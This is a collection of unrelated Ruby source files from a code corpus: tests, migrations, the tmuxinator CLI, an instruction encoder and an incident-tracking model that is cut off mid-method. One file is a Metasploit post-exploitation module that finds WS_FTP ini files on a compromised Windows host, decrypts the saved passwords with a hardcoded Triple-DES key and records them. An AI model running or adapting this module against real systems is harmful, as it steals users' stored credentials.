@scale, @crop = @geo.transformation_to @dst, true
end
should "be able to return the correct scaling transformation geometry #{args[2]}" do
assert_equal args[2], @scale
end
should "be able to return the correct crop transformation geometry #{args[3]}" do
assert_equal args[3], @crop
end
end
end
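    # Each entry: an original size string followed by a map from the geometry
    # passed to resize_to to the expected [width, height] of the result.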
[['256x256', '150x150!' => [150, 150], '150x150#' => [150, 150], '150x150>' => [150, 150], '150x150<' => [256, 256], '150x150' => [150, 150]],
['256x256', '512x512!' => [512, 512], '512x512#' => [512, 512], '512x512>' => [256, 256], '512x512<' => [512, 512], '512x512' => [512, 512]],
['600x400', '512x512!' => [512, 512], '512x512#' => [512, 512], '512x512>' => [512, 341], '512x512<' => [600, 400], '512x512' => [512, 341]]].each do |original_size, options|
options.each_pair do |size, dimensions|
context "#{original_size} resize_to #{size}" do
setup do
@source = Paperclip::Geometry.parse original_size
@new_geometry = @source.resize_to size
end
should "have #{dimensions.first} width" do
assert_equal dimensions.first, @new_geometry.width
end
should "have #{dimensions.last} height" do
assert_equal dimensions.last, @new_geometry.height
end
end
end
end
end
end
| 36.207965 | 179 | 0.6164 |
ff0a52c9f777dab3d09e74fa8f3e8ada2f37d3ee | 410 | # typed: true
class CreateReleasePublishers < ActiveRecord::Migration[5.2]
def change
create_table :release_publishers do |t|
t.references :release, null: false
t.references :company, null: false
t.timestamps
end
add_foreign_key :release_publishers, :releases,
on_delete: :cascade
add_foreign_key :release_publishers, :companies,
on_delete: :cascade
end
end
| 24.117647 | 60 | 0.709756 |
e2deb307d6016aa189802665a1bd7694c0c1f228 | 697 | module Players
module Suppression
def suppress_guns?
@suppress_guns || zone.suppress_guns
end
def suppress_mining?
@suppress_mining || zone.suppress_mining
end
def suppress!(type, is_suppressed = true)
case type
when :flight
@suppress_flight = is_suppressed
queue_message ZoneStatusMessage.new('suppress_flight' => is_suppressed)
when :guns
@suppress_guns = is_suppressed
queue_message ZoneStatusMessage.new('suppress_guns' => is_suppressed)
when :mining
@suppress_mining = is_suppressed
queue_message ZoneStatusMessage.new('suppress_mining' => is_suppressed)
end
end
end
end | 25.814815 | 79 | 0.684362 |
1c3c2f8d5975b666b7c41fe3401df0595114b42a | 294 | # frozen_string_literal: true
module Dor
class RegistrationResponse
attr_reader :params
delegate :to_json, to: :params
def initialize(p_hash)
@params = p_hash
end
def to_txt
@params[:pid]
end
def location
@params[:location]
end
end
end
| 14 | 34 | 0.639456 |
21399a9b9dd53b0111df9c3713e5975ddfd78783 | 237 | class RemoveCompletedAsDesignedAndReversedDirectionFromManeuvers < ActiveRecord::Migration
def change
remove_column :maneuvers, :completed_as_designed, :boolean
remove_column :maneuvers, :reversed_direction, :boolean
end
end
| 33.857143 | 90 | 0.827004 |
ab2176f8271728889437b6267586c80842480cdd | 949 | Pod::Spec.new do |s|
s.name = '[email protected]'
s.version = '1.2.23-SNAPSHOT'
s.license = { :type => 'PRIVATE', :text => 'PRIVATE' }
s.summary = 'Stream api port to Java 7.'
s.homepage = 'http://www.mirego.com'
s.authors = { 'Mirego, Inc.' => '[email protected]' }
s.source = { :git => '[email protected]:mirego/Lightweight-Stream-API.git', :tag => 'lightweight-stream-' + s.version.to_s }
s.requires_arc = false
s.prepare_command = <<-CMD
export ANDROID_HOME="${ANDROID_HOME:-$HOME/Library/Android/sdk}"
export J2OBJC_VERSION="${J2OBJC_VERSION:-2.5}"
./gradlew j2objc_pod
CMD
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.6'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.source_files = 'stream-j2objc/**/*.{h,m}'
s.header_mappings_dir = 'stream-j2objc'
s.dependency 'J2ObjC@mirego', '>= 2.5'
s.dependency 'J2ObjC@mirego/jsr305'
end
| 33.892857 | 125 | 0.653319 |
91252526a036fb8ee3d1fd3e862bd92356eb8df4 | 748 | require_relative './base_job'
module Resque
class UserMigrationJobs < BaseJob
module Export
@queue = :user_migrations
def self.perform(options = {})
Carto::UserMigrationExport.find(options['export_id']).run_export
rescue => e
CartoDB::Logger.error(exception: e, message: 'Error exporting user data', export_id: options['export_id'])
raise e
end
end
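    # Sketch of how these jobs are typically enqueued (the actual call sites are
    # not part of this file):
    #   Resque.enqueue(Resque::UserMigrationJobs::Export, 'export_id' => export.id)
    #   Resque.enqueue(Resque::UserMigrationJobs::Import, 'import_id' => import.id)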
module Import
@queue = :user_migrations
def self.perform(options = {})
Carto::UserMigrationImport.find(options['import_id']).run_import
rescue => e
CartoDB::Logger.error(exception: e, message: 'Error importing user data', import_id: options['import_id'])
raise e
end
end
end
end
| 26.714286 | 114 | 0.65107 |
e8502784e0468fafaebe24c67859d150280b38bb | 204 | class PgqPlaces < Pgq::Consumer
# to insert event: PgqPlaces.my_event(1, 2, 3)
# async execute
def my_event(a, b, c)
logger.info "async call my_event with #{[a, b, c].inspect}"
end
end
| 18.545455 | 63 | 0.642157 |
e94ed7d9fd019c004981a840863221ed96bda094 | 7,638 | module Tmuxinator
class Cli < Thor
# By default, Thor returns exit(0) when an error occurs.
# Please see: https://github.com/tmuxinator/tmuxinator/issues/192
def self.exit_on_failure?
true
end
include Tmuxinator::Util
COMMANDS = {
commands: "Lists commands available in tmuxinator",
completions: "Used for shell completion",
new: "Create a new project file and open it in your editor",
open: "Alias of new",
start: <<-DESC,
Start a tmux session using a project's tmuxinator config,
with an optional [ALIAS] for project reuse
DESC
stop: <<-DESC,
Stop a tmux session using a project's tmuxinator config.
DESC
local: "Start a tmux session using ./.tmuxinator.yml",
debug: "Output the shell commands that are generated by tmuxinator",
copy: <<-DESC,
Copy an existing project to a new project and open it in
your editor
DESC
delete: "Deletes given project",
implode: "Deletes all tmuxinator projects",
version: "Display installed tmuxinator version",
doctor: "Look for problems in your configuration",
list: "Lists all tmuxinator projects"
}
package_name "tmuxinator" \
unless Gem::Version.create(Thor::VERSION) < Gem::Version.create("0.18")
desc "commands", COMMANDS[:commands]
def commands(shell = nil)
out = if shell == "zsh"
COMMANDS.map do |command, desc|
"#{command}:#{desc}"
end.join("\n")
else
COMMANDS.keys.join("\n")
end
say out
end
desc "completions [arg1 arg2]", COMMANDS[:completions]
def completions(arg)
if %w(start stop open copy delete).include?(arg)
configs = Tmuxinator::Config.configs
say configs.join("\n")
end
end
desc "new [PROJECT]", COMMANDS[:new]
map "open" => :new
map "edit" => :new
map "o" => :new
map "e" => :new
map "n" => :new
method_option :local, type: :boolean,
aliases: ["-l"],
desc: "Create local project file at ./.tmuxinator.yml"
def new(name)
project_file = find_project_file(name, options[:local])
Kernel.system("$EDITOR #{project_file}") || doctor
end
no_commands do
def find_project_file(name, local = false)
path = if local
Tmuxinator::Config::LOCAL_DEFAULT
else
Tmuxinator::Config.default_project(name)
end
if File.exists?(path)
path
else
generate_project_file(name, path)
end
end
def generate_project_file(name, path)
template = Tmuxinator::Config.default? ? :default : :sample
content = File.read(Tmuxinator::Config.send(template.to_sym))
erb = Erubis::Eruby.new(content).result(binding)
File.open(path, "w") { |f| f.write(erb) }
path
end
def create_project(project_options = {})
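        # Three-way attach switch: when the --attach option was not given, both
        # force flags stay false; --attach forces attaching and --no-attach
        # forces detaching.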
attach_opt = project_options[:attach]
attach = !attach_opt.nil? && attach_opt ? true : false
detach = !attach_opt.nil? && !attach_opt ? true : false
options = {
force_attach: attach,
force_detach: detach,
name: project_options[:name],
custom_name: project_options[:custom_name],
args: project_options[:args]
}
begin
Tmuxinator::Config.validate(options)
rescue => e
exit! e.message
end
end
def render_project(project)
if project.deprecations.any?
project.deprecations.each { |deprecation| say deprecation, :red }
say
print "Press ENTER to continue."
STDIN.getc
end
Kernel.exec(project.render)
end
def kill_project(project)
Kernel.exec(project.tmux_kill_session_command)
end
end
desc "start [PROJECT] [ARGS]", COMMANDS[:start]
map "s" => :start
method_option :attach, type: :boolean,
aliases: "-a",
desc: "Attach to tmux session after creation."
method_option :name, aliases: "-n",
desc: "Give the session a different name"
def start(name, *args)
params = {
name: name,
custom_name: options[:name],
attach: options[:attach],
args: args
}
project = create_project(params)
render_project(project)
end
desc "stop [PROJECT]", COMMANDS[:stop]
map "st" => :stop
def stop(name)
params = {
name: name
}
project = create_project(params)
kill_project(project)
end
desc "local", COMMANDS[:local]
map "." => :local
def local
render_project(create_project(attach: options[:attach]))
end
method_option :attach, type: :boolean,
aliases: "-a",
desc: "Attach to tmux session after creation."
method_option :name, aliases: "-n",
desc: "Give the session a different name"
desc "debug [PROJECT] [ARGS]", COMMANDS[:debug]
def debug(name, *args)
params = {
name: name,
custom_name: options[:name],
attach: options[:attach],
args: args
}
project = create_project(params)
say project.render
end
desc "copy [EXISTING] [NEW]", COMMANDS[:copy]
map "c" => :copy
map "cp" => :copy
def copy(existing, new)
existing_config_path = Tmuxinator::Config.project(existing)
new_config_path = Tmuxinator::Config.project(new)
exit!("Project #{existing} doesn't exist!") \
unless Tmuxinator::Config.exists?(existing)
new_exists = Tmuxinator::Config.exists?(new)
question = "#{new} already exists, would you like to overwrite it?"
if !new_exists || yes?(question, :red)
say "Overwriting #{new}" if Tmuxinator::Config.exists?(new)
FileUtils.copy_file(existing_config_path, new_config_path)
end
Kernel.system("$EDITOR #{new_config_path}")
end
desc "delete [PROJECT1] [PROJECT2] ...", COMMANDS[:delete]
map "d" => :delete
map "rm" => :delete
def delete(*projects)
projects.each do |project|
if Tmuxinator::Config.exists?(project)
config = Tmuxinator::Config.project(project)
if yes?("Are you sure you want to delete #{project}?(y/n)", :red)
FileUtils.rm(config)
say "Deleted #{project}"
end
else
say "#{project} does not exist!"
end
end
end
desc "implode", COMMANDS[:implode]
map "i" => :implode
def implode
if yes?("Are you sure you want to delete all tmuxinator configs?", :red)
FileUtils.remove_dir(Tmuxinator::Config.root)
say "Deleted all tmuxinator projects."
end
end
desc "list", COMMANDS[:list]
map "l" => :list
map "ls" => :list
def list
say "tmuxinator projects:"
print_in_columns Tmuxinator::Config.configs
end
desc "version", COMMANDS[:version]
map "-v" => :version
def version
say "tmuxinator #{Tmuxinator::VERSION}"
end
desc "doctor", COMMANDS[:doctor]
def doctor
say "Checking if tmux is installed ==> "
yes_no Tmuxinator::Config.installed?
say "Checking if $EDITOR is set ==> "
yes_no Tmuxinator::Config.editor?
say "Checking if $SHELL is set ==> "
yes_no Tmuxinator::Config.shell?
end
end
end
| 28.184502 | 80 | 0.581173 |
f7331dfb0075b2a4400a631f3221ef96e12f4675 | 103 | json.extract! name, :id, :e_no, :name, :created_at, :updated_at
json.url name_url(name, format: :json)
| 34.333333 | 63 | 0.718447 |
bb8d3bd7c1e97e3574266d7a9cf70962978c2565 | 5,066 | require 'minitest/autorun'
require 'mocha/mini_test'
require_relative '../test_helper'
require_relative '../../../_tests/lib/run_test_options'
class TestRunTestOptions < MiniTest::Test
def setup
@test_dir = '_tests'
@run_tests_options = RunTestOptions.new(@test_dir)
clear_env_variables
end
def teardown
clear_env_variables
end
def clear_env_variables
ENV['github_status_sha1'] = nil
ENV['github_status_context'] = nil
ENV['rhd_test'] = 'e2e'
ENV['HOST_TO_TEST'] = nil
ENV['RHD_JS_DRIVER'] = nil
end
def test_non_docker_e2e_test_execution_no_base_url_specified
Kernel.expects(:abort).with('Please specify a base url. For example --base-url=http://foo.com')
test_configuration = @run_tests_options.parse_command_line(%w(--e2e))
assert_equal('chrome', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=", test_configuration[:run_tests_command])
end
def test_docker_e2e_test_execution_no_base_url_specified
Kernel.expects(:abort).with('Please specify a base url. For example --base-url=http://foo.com')
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --use-docker --browser=chrome))
assert_equal('chrome', test_configuration[:browser])
assert_equal('npm run e2e:docker -- --baseUrl=', test_configuration[:run_tests_command])
end
def test_non_docker_e2e_test_execution
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com))
refute(test_configuration[:docker])
assert_equal('chrome', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=http://foo.com", test_configuration[:run_tests_command])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_default_execution_using_docker
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker))
assert(test_configuration[:docker])
assert_equal('chrome', test_configuration[:browser])
assert_equal('npm test -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('chrome', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_docker_execution_specifying_update_github_status
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --update-github-status=123))
assert(test_configuration[:docker])
assert_equal('npm test -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('123', ENV['github_status_sha1'])
assert_equal('FE:node-e2e-tests', ENV['github_status_context'])
assert_equal('true', ENV['github_status_enabled'])
end
def test_docker_execution_specifying_docker_firefox_browser
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --browser=firefox))
assert(test_configuration[:docker])
assert_equal('firefox', test_configuration[:browser])
assert_equal('npm run e2e:docker -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('firefox', ENV['RHD_JS_DRIVER'])
assert_equal('firefox', test_configuration[:docker_node])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
end
def test_docker_execution_specifying_remote_browser
ENV['RHD_BS_AUTHKEY'] = '12345'
ENV['RHD_BS_USERNAME'] = 'foobar'
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-docker --use-browserstack --browser=bs_ie_11))
assert(test_configuration[:docker])
assert(test_configuration[:browserstack])
assert_equal('bs_ie_11', test_configuration[:browser])
assert_equal('npm run e2e:browserstack -- --baseUrl=http://foo.com', test_configuration[:run_tests_command])
assert_equal('bs_ie_11', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
assert_equal('12345', ENV['RHD_BS_AUTHKEY'])
assert_equal('foobar', ENV['RHD_BS_USERNAME'])
end
def test_non_docker_execution_specifying_remote_browser
ENV['RHD_BS_AUTHKEY'] = '12345'
ENV['RHD_BS_USERNAME'] = 'foobar'
test_configuration = @run_tests_options.parse_command_line(%w(--e2e --base-url=http://foo.com --use-browserstack --browser=bs_ie_11))
assert(test_configuration[:browserstack])
assert_equal('bs_ie_11', test_configuration[:browser])
assert_equal("cd #{@test_dir}/e2e && npm run e2e -- --baseUrl=http://foo.com", test_configuration[:run_tests_command])
assert_equal('bs_ie_11', ENV['RHD_JS_DRIVER'])
assert_equal(nil, ENV['github_status_sha1'])
assert_equal(nil, ENV['github_status_context'])
assert_equal('12345', ENV['RHD_BS_AUTHKEY'])
assert_equal('foobar', ENV['RHD_BS_USERNAME'])
end
end
| 42.932203 | 150 | 0.740229 |
916cb367da31c8bc31ae4f7ff6393bbdd5313642 | 140 | require 'rails_helper'
RSpec.describe ExaminationTypeSetting, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.333333 | 56 | 0.771429 |
87e6427db2a692a5868954c7911d3fb93d50ed51 | 4,298 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction PSLLD
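    # Each form below pairs a list of operand types with an encoder that emits
    # the REX prefix, opcode bytes, ModRM byte and, for the imm8 forms, the
    # trailing immediate.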
forms = []
operands = []
encodings = []
# pslld: mm, imm8
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[1]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
0,
0,
operands[0].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x72, 0
add_modrm(buffer,
3,
6,
operands[0].op_value, operands)
add_immediate buffer, operands[1].op_value, 1
end
def bytesize; 4; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: mm, mm
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[36]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: mm, m64
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, imm8
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[1]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
0,
0,
operands[0].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x72, 0
add_modrm(buffer,
3,
6,
operands[0].op_value, operands)
add_immediate buffer, operands[1].op_value, 1
end
def bytesize; 4; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, xmm
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# pslld: xmm, m128
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[25]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0xF2, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
PSLLD = Instruction.new("PSLLD", forms)
end
end
| 27.031447 | 53 | 0.531177 |
ff7cd985263e617e185a9c59d162d640bd9fd6f5 | 3,193 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rex/parser/ini'
require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather WS_FTP Saved Password Extraction',
'Description' => %q{
This module extracts weakly encrypted saved FTP Passwords
from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.
},
'License' => MSF_LICENSE,
'Author' => [ 'theLightCosine'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
print_status("Checking Default Locations...")
grab_user_profiles().each do |user|
next if user['AppData'] == nil
check_appdata(user['AppData'] + "\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini")
check_appdata(user['AppData'] + "\\Ipswitch\\WS_FTP Home\\Sites\\ws_ftp.ini")
end
end
def check_appdata(path)
begin
client.fs.file.stat(path)
print_status("Found File at #{path}")
get_ini(path)
rescue
print_status("#{path} not found ....")
end
end
def get_ini(filename)
config = client.fs.file.new(filename, 'r')
parse = config.read
ini = Rex::Parser::Ini.from_s(parse)
ini.each_key do |group|
next if group == "_config_"
print_status("Processing Saved Session #{group}")
host = ini[group]['HOST']
host = host.delete "\""
username = ini[group]['UID']
username = username.delete "\""
port = ini[group]['PORT']
passwd = ini[group]['PWD']
passwd = decrypt(passwd)
next if passwd == nil or passwd == ""
port = 21 if port == nil
print_good("Host: #{host} Port: #{port} User: #{username} Password: #{passwd}")
service_data = {
address: Rex::Socket.getaddress(host),
port: port,
protocol: "tcp",
service_name: "ftp",
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
username: username,
private_data: passwd,
private_type: :password
}
credential_core = create_credential(credential_data.merge(service_data))
login_data = {
core: credential_core,
access_level: "User",
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(login_data.merge(service_data))
end
end
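  # WS_FTP stores each saved password base64-encoded and encrypted with
  # Triple-DES (EDE3-CBC) under a fixed key/IV, so it can be recovered offline
  # as done below.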
def decrypt(pwd)
decoded = pwd.unpack("m*")[0]
key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"
iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"
des = OpenSSL::Cipher::Cipher.new("des-ede3-cbc")
des.decrypt
des.key = key
des.iv = iv
result = des.update(decoded)
final = result.split("\000")[0]
return final
end
end
| 28.508929 | 108 | 0.613843 |
bf8bdb358f447b84f36aa176c9e460902cedd0a2 | 14,593 | # encoding: utf-8
class Incedent < ActiveRecord::Base
include ApplicationHelper
include Workflow
workflow_column :state
workflow do
end
acts_as_nested_set
include TheSortableTree::Scopes
audit(:create) { |model, user, action| "Жалоба \"#{model.name}\" создана пользователем #{user.display_name}" }
audit(:update) { |model, user, action| "Жалоба \"#{model.name}\" изменена пользователем #{user.display_name}" }
audit(:destroy) { |model, user, action| "Пользователь #{user.display_name} удалил жалобу \"#{model.name}\"" }
before_save :default_values, :set_finish_at_to_all
belongs_to :operator, class_name: 'User', foreign_key: 'operator_id'
belongs_to :initiator, class_name: 'User', foreign_key: 'initiator_id'
belongs_to :status
belongs_to :priority
belongs_to :type
belongs_to :server
belongs_to :service_class
belongs_to :parent,
:class_name => "Incedent",
:foreign_key => "parent_id"
validates :name, :description, presence: true
has_many :incedent_observers, dependent: :delete_all
has_many :observers, through: :incedent_observers, dependent: :delete_all
has_many :incedent_workers, dependent: :delete_all
has_many :workers, through: :incedent_workers, dependent: :delete_all
has_many :incedent_reviewers, dependent: :delete_all
has_many :reviewers, through: :incedent_reviewers, dependent: :delete_all
has_many :incedent_tags, dependent: :delete_all
has_many :tags, through: :incedent_tags, dependent: :delete_all
has_many :incedent_comments, dependent: :delete_all
has_many :comments, through: :incedent_comments, dependent: :delete_all
has_many :incedent_attaches, dependent: :delete_all
has_many :attaches, through: :incedent_attaches, dependent: :delete_all
has_many :incedent_actions
has_many :childs,
:class_name => "Incedent",
:foreign_key => "parent_id",
:order => "name",
:dependent => :delete_all
accepts_nested_attributes_for :attaches, allow_destroy: true
attr_accessible :description, :name, :tags, :incedent_actions, :tag_ids, :operator, :initiator, :worker, :observer, :server, :operator_id, :initiator_id, :priority_id
attr_accessible :type_id, :status_id, :worker_id, :server_id, :closed, :reject_reason, :replay_reason, :close_reason, :work_reason, :review_reason, :attaches_attributes, :observer_id
attr_accessible :parent_id, :parent, :childs, :finish_at, :service_class_id, :state, :observers, :reviewers, :workers, :observer_ids, :reviewer_ids, :worker_ids
attr_accessor :reject_reason, :work_reason, :replay_reason, :close_reason, :review_reason
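  # Role-based scopes: worker/observer/reviewer membership is resolved through
  # subqueries against the incedent_* join tables, while initiator/operator are
  # plain foreign keys on this table.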
scope :not_reviewed, lambda { |user| where("id in (select incedent_id from incedent_reviewers where user_id = ? and reviewed_at is null)", user) unless user.nil? }
scope :by_tag, lambda {|tag| where("id in (select incedent_id from incedent_tags where tag_id = ?)", tag) unless tag.nil? }
scope :by_initiator, lambda { |user| where("initiator_id = ?", user) unless user.nil? }
scope :by_operator, lambda { |user| where("operator_id = ?", user) unless user.nil? }
scope :by_worker, lambda { |user| where("id in (select incedent_id from incedent_workers where user_id = ?)", user) unless user.nil? }
scope :by_observer, lambda { |user| where("id in (select incedent_id from incedent_observers where user_id = ?)", user) unless user.nil? }
scope :by_reviewer, lambda { |user| where("id in (select incedent_id from incedent_reviewers where user_id = ?)", user) unless user.nil? }
scope :by_initiator_worker_reviewer, lambda { |user| where("(initiator_id = ?) or (id in (select incedent_id from incedent_workers where user_id = ?)) or (id in (select incedent_id from incedent_reviewers where user_id = ?))", user, user, user) unless user.nil? }
scope :by_operator_initiator_worker_reviewer, lambda { |user| where("(operator_id = ?) or (initiator_id = ?) or (id in (select incedent_id from incedent_workers where user_id = ?)) or (id in (select incedent_id from incedent_reviewers where user_id = ?))", user, user, user, user) unless user.nil? }
scope :by_type, lambda { |type| where("type_id = ?", type) unless type.nil? }
scope :by_status, lambda { |status| where("status_id = ?", status) unless status.nil? }
scope :by_server, lambda { |server| where("server_id = ?", server) unless server.nil? }
scope :by_priority, lambda { |priority| where("priority_id = ?", priority) unless priority.nil? }
scope :by_parent, lambda { |parent| where("parent_id = ?", parent) unless parent.nil? }
scope :solved, lambda { |archive| where('closed = ?', archive) }
scope :closed, where("status_id = ? and closed = ?", Houston::Application.config.incedent_closed, false)
def has_parent?
!self.parent_id.nil?
end
def have_childs?
self.childs.present?
end
def parents_count
count = 0
if self.has_parent?
count = 1
count += self.parent.parents_count
end
count
end
def default_values
self.initiator_id ||= current_user
self.status_id ||= Houston::Application.config.incedent_created
self.operator_id ||= self.initiator_id
self.finish_at ||= get_datetime(DateTime.now, 8)
end
def has_worker? user = nil
if user.nil?
return self.has_workers?
else
self.incedent_workers.each do |worker|
return true if (worker.worker.id == user.id)
end
end
return false
end
def has_observer? user = nil
if user.nil?
return self.has_observers?
else
self.incedent_observers.each do |observer|
return true if (observer.observer.id == user.id)
end
end
return false
end
def has_reviewer? user = nil
if user.nil?
return self.has_reviewers?
else
self.incedent_reviewers.each do |reviewer|
return true if (reviewer.reviewer.id == user.id)
end
end
return false
end
def has_reviewed? user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
return true if (reviewer.reviewer.id == user.id) and (!reviewer.reviewed_at.nil?)
end
end
return false
end
def has_workers?
self.workers.present?
end
def has_observers?
self.observers.present?
end
def has_reviewers?
self.reviewers.present?
end
def has_operator?
!self.operator.nil?
end
def has_initiator?
!self.initiator.nil?
end
def has_service_class?
!self.service_class.nil?
end
def is_overdated_now? user = nil
unless user.nil?
self.incedent_workers.each do |worker|
return (worker.finish_at < get_datetime(DateTime.now, 0)) if (worker.worker.id == user.id)
end
end
return (self.finish_at < get_datetime(DateTime.now, 0))
end
def is_overdated_soon? user = nil
unless user.nil?
self.incedent_workers.each do |worker|
return ((worker.finish_at >= get_datetime(DateTime.now, 4)) && (worker.finish_at <= get_datetime(DateTime.now, 6))) if (worker.worker.id == user.id)
end
end
return ((self.finish_at >= get_datetime(DateTime.now, 4)) && (self.finish_at <= get_datetime(DateTime.now, 6)))
end
def is_overdated_review? user = nil
((self.has_reviewer? user) && (!self.has_reviewed? user) && (self.has_service_class?) && (get_datetime(self.created_at, self.service_class.review_hours) <= Time.now))
end
def is_need_review? user = nil
unless user.nil?
((self.has_reviewer? user) && (!self.has_reviewed? user))
else
((self.has_reviewers?) && (!self.has_reviewed?))
end
end
def is_played? user = nil
self.get_status Houston::Application.config.incedent_played, user
end
def is_paused? user = nil
self.get_status Houston::Application.config.incedent_paused, user
end
def is_stoped? user = nil
self.get_status Houston::Application.config.incedent_stoped, user
end
def is_rejected? user = nil
self.get_status Houston::Application.config.incedent_rejected, user
end
def is_solved? user = nil
self.status_id == Houston::Application.config.incedent_solved or self.closed
end
def is_closed? user = nil
unless user.nil?
return self.get_status Houston::Application.config.incedent_closed, user
else
self.incedent_workers.each do |worker|
return true if (self.is_closed? worker.worker)
end
end
end
def is_waited? user = nil
self.get_status Houston::Application.config.incedent_waited, user
end
def delete_observer user
self.incedent_observers.each do |observer|
observer.destroy if (observer.observer == user)
end
end
def delete_observers
self.incedent_observers.each do |observer|
observer.destroy
end
end
def add_observer user
IncedentObserver.create(incedent: self, observer: user).save
end
def delete_worker user
self.incedent_workers.each do |worker|
worker.destroy if (worker.worker == user)
end
end
def delete_workers
self.incedent_workers.each do |worker|
worker.destroy
end
end
def add_worker user, status = 3
IncedentWorker.create(incedent: self, worker: user, status_id: status).save
end
def delete_reviewer user
self.incedent_reviewers.each do |reviewer|
reviewer.destroy if (reviewer.reviewer == user)
end
end
def delete_reviewers
self.incedent_reviewers.each do |reviewer|
reviewer.destroy
end
end
def add_reviewer user
IncedentReviewer.create(incedent: self, reviewer: user).save
end
def played! user = nil
unless user.nil?
if self.is_need_review? user
self.waited! user
else
self.set_status Houston::Application.config.incedent_played, user
self.closed = false
end
else
if self.is_need_review?
self.set_status_all Houston::Application.config.incedent_waited
self.status_id = Houston::Application.config.incedent_waited
self.closed = false
else
self.set_status_all Houston::Application.config.incedent_played
self.status_id = Houston::Application.config.incedent_played
self.closed = false
end
end
end
def paused! user = nil
self.set_status Houston::Application.config.incedent_paused, user
self.closed = false
end
def stoped! user = nil
self.set_status Houston::Application.config.incedent_stoped, user
self.closed = false
end
def rejected! user = nil
self.set_status Houston::Application.config.incedent_rejected, user
self.closed = false
end
def reviewed! user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
if (reviewer.reviewer == user)
reviewer.reviewed_at = Time.now
reviewer.save
end
end
else
self.incedent_reviewers.each do |reviewer|
reviewer.reviewed_at = Time.now
reviewer.save
end
end
end
def unreviewed! user = nil
unless user.nil?
self.incedent_reviewers.each do |reviewer|
if (reviewer.reviewer == user)
